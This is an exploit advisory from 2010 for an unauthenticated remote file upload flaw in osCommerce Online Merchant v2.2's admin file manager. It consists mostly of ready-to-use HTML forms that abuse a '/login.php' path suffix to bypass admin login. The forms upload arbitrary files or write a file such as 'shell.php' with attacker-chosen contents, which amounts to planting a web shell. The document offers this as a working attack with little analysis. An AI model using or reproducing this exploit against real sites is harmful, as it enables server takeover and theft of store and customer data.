# Ariko-Security: Security Audits , Audyt bezpieczeństwa
# Advisory: 690/2010

[$] Exploit Title : Oscommerce Online Merchant v2.2 - Remote File Upload
[$] Date : 30-05-2010
[$] Author : MasterGipy
[$] Email : mastergipy [at] gmail.com
[$] Bug : Remote File Upload
[$] Vendor : http://www.oscommerce.com
[$] Google Dork : n/a


[%] vulnerable file: /admin/file_manager.php

[REMOTE FILE UPLOAD VULNERABILITY]

[$] Exploit:

<html><head><title>Oscommerce Online Merchant v2.2 - Remote File Upload </title></head>
<br><br><u>UPLOAD FILE:</u><br>
<form name="file" action="http://<-- CHANGE HERE -->/admin/file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data">
<input type="file" name="file_1"><br>
<input name="submit" type="submit" value=" Upload " >
</form>

<br><u>CREATE FILE:</u><br>
<form name="new_file" action="http://<-- CHANGE HERE -->/admin/file_manager.php/login.php?action=save" method="post">
FILE NAME:<br>
<input type="text" name="filename">&nbsp; (ex. shell.php)<br>FILE CONTENTS:<br>
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>
<input name="submit" type="submit" value=" Save " >
</form>
</html>



[=] Thanks to Flyff666 for the original exploit:
- Oscommerce Online Merchant v2.2 File Disclosure / Admin ByPass

[§] Greetings from PORTUGAL ^^
&nbsp;</p>